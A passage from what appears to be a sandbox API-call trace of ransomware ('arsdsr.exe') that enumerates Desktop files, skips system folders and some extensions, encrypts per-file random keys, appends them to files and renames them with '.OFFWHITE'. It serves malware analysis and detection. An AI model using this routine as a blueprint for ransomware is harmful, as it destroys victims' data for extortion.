lpString2="KERNEL32.DLL") returned 0 [0132.343] PathFindExtensionW (pszPath="1hUSW_AfObc55t.png") returned=".png" [0132.343] lstrcmpiW (lpString1=".png", lpString2=".exe") returned 1 [0132.343] lstrcmpiW (lpString1=".png", lpString2=".log") returned 1 [0132.343] lstrcmpiW (lpString1=".png", lpString2=".cab") returned 1 [0132.343] lstrcmpiW (lpString1=".png", lpString2=".cmd") returned 1 [0132.343] lstrcmpiW (lpString1=".png", lpString2=".com") returned 1 [0132.343] lstrcmpiW (lpString1=".png", lpString2=".cpl") returned 1 [0132.343] lstrcmpiW (lpString1=".png", lpString2=".ini") returned 1 [0132.343] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0132.343] lstrcmpiW (lpString1=".png", lpString2=".url") returned -1 [0132.343] lstrcmpiW (lpString1=".png", lpString2=".ttf") returned -1 [0132.343] lstrcmpiW (lpString1=".png", lpString2=".mp3") returned 1 [0132.343] lstrcmpiW (lpString1=".png", lpString2=".pif") returned 1 [0132.343] lstrcmpiW (lpString1=".png", lpString2=".mp4") returned 1 [0132.343] lstrcmpiW (lpString1=".png", lpString2=".OFFWHITE") returned 1 [0132.343] lstrcmpiW (lpString1=".png", lpString2=".msi") returned 1 [0132.343] lstrcmpiW (lpString1="1hUSW_AfObc55t.png", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0132.344] GetProcessHeap () returned 0x500000 [0132.344] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x53f498 [0132.344] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-\\1hUSW_AfObc55t.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\plgxx-\\1husw_afobc55t.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0132.345] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=57558) returned 1 [0132.345] GetProcessHeap () returned 0x500000 [0132.345] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0132.345] GetProcessHeap () returned 0x500000 [0132.345] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0132.345] GetProcessHeap () returned 0x500000 [0132.345] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0132.345] GetProcessHeap () returned 0x500000 [0132.345] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0132.345] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.345] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.345] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0132.345] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.345] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.346] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0132.346] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.346] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.346] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295dc90*=0x100) returned 1 [0132.346] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.346] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.346] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0132.346] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xe0d6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.346] SetLastError (dwErrCode=0x0) [0132.346] WriteFile (in: hFile=0x21c, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0132.350] GetLastError () returned 0x0 [0132.350] GetLastError () returned 0x0 [0132.350] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xe1d6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.350] WriteFile (in: hFile=0x21c, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0132.350] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xe2d6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.350] WriteFile (in: hFile=0x21c, lpBuffer=0x53f498*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x53f498*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0132.350] GetProcessHeap () returned 0x500000 [0132.350] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0xe0d6) returned 0x5587b8 [0132.350] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.350] ReadFile (in: hFile=0x21c, lpBuffer=0x5587b8, nNumberOfBytesToRead=0xe0d6, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x5587b8*, lpNumberOfBytesRead=0x295dec0*=0xe0d6, lpOverlapped=0x0) returned 1 [0132.355] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.355] WriteFile (in: hFile=0x21c, lpBuffer=0x5587b8*, nNumberOfBytesToWrite=0xe0d6, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5587b8*, lpNumberOfBytesWritten=0x295decc*=0xe0d6, lpOverlapped=0x0) returned 1 [0132.355] GetProcessHeap () returned 0x500000 [0132.355] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5587b8 | out: hHeap=0x500000) returned 1 [0132.355] CloseHandle (hObject=0x21c) returned 1 [0132.357] GetProcessHeap () returned 0x500000 [0132.357] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0132.357] GetProcessHeap () returned 0x500000 [0132.357] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0132.357] GetProcessHeap () returned 0x500000 [0132.357] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0132.357] GetProcessHeap () returned 0x500000 [0132.357] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0132.357] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-\\1hUSW_AfObc55t.png" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-\\1hUSW_AfObc55t.png") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-\\1hUSW_AfObc55t.png" [0132.357] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-\\1hUSW_AfObc55t.png", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-\\1hUSW_AfObc55t.png.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-\\1hUSW_AfObc55t.png.OFFWHITE" [0132.357] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-\\1hUSW_AfObc55t.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\plgxx-\\1husw_afobc55t.png"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-\\1hUSW_AfObc55t.png.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\plgxx-\\1husw_afobc55t.png.offwhite")) returned 1 [0132.361] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19aa92d0, ftCreationTime.dwHighDateTime=0x1d5da22, ftLastAccessTime.dwLowDateTime=0x13c55490, ftLastAccessTime.dwHighDateTime=0x1d5e22e, ftLastWriteTime.dwLowDateTime=0x13c55490, ftLastWriteTime.dwHighDateTime=0x1d5e22e, nFileSizeHigh=0x0, nFileSizeLow=0x80dd, dwReserved0=0x295debc, dwReserved1=0x4c0a66fd, cFileName="9_Ixx0UfvSYGaSqL QS.wav", cAlternateFileName="9_IXX0~1.WAV")) returned 1 [0132.361] lstrcmpiW (lpString1="9_Ixx0UfvSYGaSqL QS.wav", lpString2=".") returned 1 [0132.361] lstrcmpiW (lpString1="9_Ixx0UfvSYGaSqL QS.wav", lpString2="..") returned 1 [0132.361] lstrcmpiW (lpString1="9_Ixx0UfvSYGaSqL QS.wav", lpString2="...") returned 1 [0132.361] lstrcmpiW (lpString1="9_Ixx0UfvSYGaSqL QS.wav", lpString2="windows") returned -1 [0132.361] lstrcmpiW (lpString1="9_Ixx0UfvSYGaSqL QS.wav", lpString2="$recycle.bin") returned 1 [0132.361] lstrcmpiW (lpString1="9_Ixx0UfvSYGaSqL QS.wav", lpString2="rsa") returned -1 [0132.361] lstrcmpiW (lpString1="9_Ixx0UfvSYGaSqL QS.wav", lpString2="ntuser.dat") returned -1 [0132.361] lstrcmpiW (lpString1="9_Ixx0UfvSYGaSqL QS.wav", lpString2="programdata") returned -1 [0132.361] lstrcmpiW (lpString1="9_Ixx0UfvSYGaSqL QS.wav", lpString2="appdata") returned -1 [0132.361] lstrcmpiW (lpString1="9_Ixx0UfvSYGaSqL QS.wav", lpString2="program files") returned -1 [0132.361] lstrcmpiW (lpString1="9_Ixx0UfvSYGaSqL QS.wav", lpString2="program files (x86)") returned -1 [0132.362] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-\\" [0132.362] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-\\", lpString2="9_Ixx0UfvSYGaSqL QS.wav" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-\\9_Ixx0UfvSYGaSqL QS.wav") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-\\9_Ixx0UfvSYGaSqL QS.wav" [0132.362] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.362] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.362] PathFindExtensionW (pszPath="9_Ixx0UfvSYGaSqL QS.wav") returned=".wav" [0132.362] lstrcmpiW (lpString1=".wav", lpString2=".exe") returned 1 [0132.362] lstrcmpiW (lpString1=".wav", lpString2=".log") returned 1 [0132.362] lstrcmpiW (lpString1=".wav", lpString2=".cab") returned 1 [0132.362] lstrcmpiW (lpString1=".wav", lpString2=".cmd") returned 1 [0132.362] lstrcmpiW (lpString1=".wav", lpString2=".com") returned 1 [0132.362] lstrcmpiW (lpString1=".wav", lpString2=".cpl") returned 1 [0132.362] lstrcmpiW (lpString1=".wav", lpString2=".ini") returned 1 [0132.362] lstrcmpiW (lpString1=".wav", lpString2=".dll") returned 1 [0132.362] lstrcmpiW (lpString1=".wav", lpString2=".url") returned 1 [0132.362] lstrcmpiW (lpString1=".wav", lpString2=".ttf") returned 1 [0132.362] lstrcmpiW (lpString1=".wav", lpString2=".mp3") returned 1 [0132.362] lstrcmpiW (lpString1=".wav", lpString2=".pif") returned 1 [0132.362] lstrcmpiW (lpString1=".wav", lpString2=".mp4") returned 1 [0132.362] lstrcmpiW (lpString1=".wav", lpString2=".OFFWHITE") returned 1 [0132.362] lstrcmpiW (lpString1=".wav", lpString2=".msi") returned 1 [0132.362] lstrcmpiW (lpString1="9_Ixx0UfvSYGaSqL QS.wav", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0132.362] GetProcessHeap () returned 0x500000 [0132.362] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x53f4a8 [0132.362] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-\\9_Ixx0UfvSYGaSqL QS.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\plgxx-\\9_ixx0ufvsygasql qs.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0132.363] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=32989) returned 1 [0132.363] GetProcessHeap () returned 0x500000 [0132.363] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0132.363] GetProcessHeap () returned 0x500000 [0132.363] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0132.363] GetProcessHeap () returned 0x500000 [0132.363] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0132.363] GetProcessHeap () returned 0x500000 [0132.363] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0132.363] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.363] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.363] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0132.363] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.363] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.363] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0132.363] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.363] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.364] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295dc90*=0x100) returned 1 [0132.364] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.364] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.364] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0132.364] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x80dd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.364] SetLastError (dwErrCode=0x0) [0132.364] WriteFile (in: hFile=0x21c, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0132.366] GetLastError () returned 0x0 [0132.366] GetLastError () returned 0x0 [0132.366] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x81dd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.366] WriteFile (in: hFile=0x21c, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0132.366] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x82dd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.367] WriteFile (in: hFile=0x21c, lpBuffer=0x53f4a8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x53f4a8*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0132.367] GetProcessHeap () returned 0x500000 [0132.367] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x80dd) returned 0x5587b8 [0132.367] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.367] ReadFile (in: hFile=0x21c, lpBuffer=0x5587b8, nNumberOfBytesToRead=0x80dd, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x5587b8*, lpNumberOfBytesRead=0x295dec0*=0x80dd, lpOverlapped=0x0) returned 1 [0132.370] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.370] WriteFile (in: hFile=0x21c, lpBuffer=0x5587b8*, nNumberOfBytesToWrite=0x80dd, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5587b8*, lpNumberOfBytesWritten=0x295decc*=0x80dd, lpOverlapped=0x0) returned 1 [0132.370] GetProcessHeap () returned 0x500000 [0132.370] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5587b8 | out: hHeap=0x500000) returned 1 [0132.370] CloseHandle (hObject=0x21c) returned 1 [0132.373] GetProcessHeap () returned 0x500000 [0132.373] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0132.373] GetProcessHeap () returned 0x500000 [0132.373] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0132.373] GetProcessHeap () returned 0x500000 [0132.373] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0132.373] GetProcessHeap () returned 0x500000 [0132.373] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0132.373] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-\\9_Ixx0UfvSYGaSqL QS.wav" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-\\9_Ixx0UfvSYGaSqL QS.wav") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-\\9_Ixx0UfvSYGaSqL QS.wav" [0132.373] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-\\9_Ixx0UfvSYGaSqL QS.wav", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-\\9_Ixx0UfvSYGaSqL QS.wav.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-\\9_Ixx0UfvSYGaSqL QS.wav.OFFWHITE" [0132.374] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-\\9_Ixx0UfvSYGaSqL QS.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\plgxx-\\9_ixx0ufvsygasql qs.wav"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-\\9_Ixx0UfvSYGaSqL QS.wav.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\plgxx-\\9_ixx0ufvsygasql qs.wav.offwhite")) returned 1 [0132.375] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5b0da20, ftCreationTime.dwHighDateTime=0x1d5e571, ftLastAccessTime.dwLowDateTime=0xe993da00, ftLastAccessTime.dwHighDateTime=0x1d5e211, ftLastWriteTime.dwLowDateTime=0xe993da00, ftLastWriteTime.dwHighDateTime=0x1d5e211, nFileSizeHigh=0x0, nFileSizeLow=0x87db, dwReserved0=0x295debc, dwReserved1=0x4c0a66fd, cFileName="b2jtLK76Bx.swf", cAlternateFileName="B2JTLK~1.SWF")) returned 1 [0132.375] lstrcmpiW (lpString1="b2jtLK76Bx.swf", lpString2=".") returned 1 [0132.375] lstrcmpiW (lpString1="b2jtLK76Bx.swf", lpString2="..") returned 1 [0132.375] lstrcmpiW (lpString1="b2jtLK76Bx.swf", lpString2="...") returned 1 [0132.375] lstrcmpiW (lpString1="b2jtLK76Bx.swf", lpString2="windows") returned -1 [0132.375] lstrcmpiW (lpString1="b2jtLK76Bx.swf", lpString2="$recycle.bin") returned 1 [0132.375] lstrcmpiW (lpString1="b2jtLK76Bx.swf", lpString2="rsa") returned -1 [0132.375] lstrcmpiW (lpString1="b2jtLK76Bx.swf", lpString2="ntuser.dat") returned -1 [0132.375] lstrcmpiW (lpString1="b2jtLK76Bx.swf", lpString2="programdata") returned -1 [0132.375] lstrcmpiW (lpString1="b2jtLK76Bx.swf", lpString2="appdata") returned 1 [0132.375] lstrcmpiW (lpString1="b2jtLK76Bx.swf", lpString2="program files") returned -1 [0132.375] lstrcmpiW (lpString1="b2jtLK76Bx.swf", lpString2="program files (x86)") returned -1 [0132.375] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-\\" [0132.375] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-\\", lpString2="b2jtLK76Bx.swf" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-\\b2jtLK76Bx.swf") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-\\b2jtLK76Bx.swf" [0132.375] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.375] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.376] PathFindExtensionW (pszPath="b2jtLK76Bx.swf") returned=".swf" [0132.376] lstrcmpiW (lpString1=".swf", lpString2=".exe") returned 1 [0132.376] lstrcmpiW (lpString1=".swf", lpString2=".log") returned 1 [0132.376] lstrcmpiW (lpString1=".swf", lpString2=".cab") returned 1 [0132.376] lstrcmpiW (lpString1=".swf", lpString2=".cmd") returned 1 [0132.376] lstrcmpiW (lpString1=".swf", lpString2=".com") returned 1 [0132.376] lstrcmpiW (lpString1=".swf", lpString2=".cpl") returned 1 [0132.376] lstrcmpiW (lpString1=".swf", lpString2=".ini") returned 1 [0132.376] lstrcmpiW (lpString1=".swf", lpString2=".dll") returned 1 [0132.376] lstrcmpiW (lpString1=".swf", lpString2=".url") returned -1 [0132.376] lstrcmpiW (lpString1=".swf", lpString2=".ttf") returned -1 [0132.376] lstrcmpiW (lpString1=".swf", lpString2=".mp3") returned 1 [0132.376] lstrcmpiW (lpString1=".swf", lpString2=".pif") returned 1 [0132.376] lstrcmpiW (lpString1=".swf", lpString2=".mp4") returned 1 [0132.376] lstrcmpiW (lpString1=".swf", lpString2=".OFFWHITE") returned 1 [0132.376] lstrcmpiW (lpString1=".swf", lpString2=".msi") returned 1 [0132.376] lstrcmpiW (lpString1="b2jtLK76Bx.swf", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0132.376] GetProcessHeap () returned 0x500000 [0132.376] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x53f4b8 [0132.376] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-\\b2jtLK76Bx.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\plgxx-\\b2jtlk76bx.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0132.377] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=34779) returned 1 [0132.377] GetProcessHeap () returned 0x500000 [0132.377] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0132.377] GetProcessHeap () returned 0x500000 [0132.377] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0132.377] GetProcessHeap () returned 0x500000 [0132.377] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0132.377] GetProcessHeap () returned 0x500000 [0132.377] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0132.377] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.378] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.378] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0132.378] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.378] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.378] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0132.378] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.378] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.378] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295dc90*=0x100) returned 1 [0132.378] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.378] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.378] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0132.378] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x87db, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.378] SetLastError (dwErrCode=0x0) [0132.378] WriteFile (in: hFile=0x21c, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0132.380] GetLastError () returned 0x0 [0132.380] GetLastError () returned 0x0 [0132.380] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x88db, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.380] WriteFile (in: hFile=0x21c, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0132.380] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x89db, lpNewFilePointer=0x0, 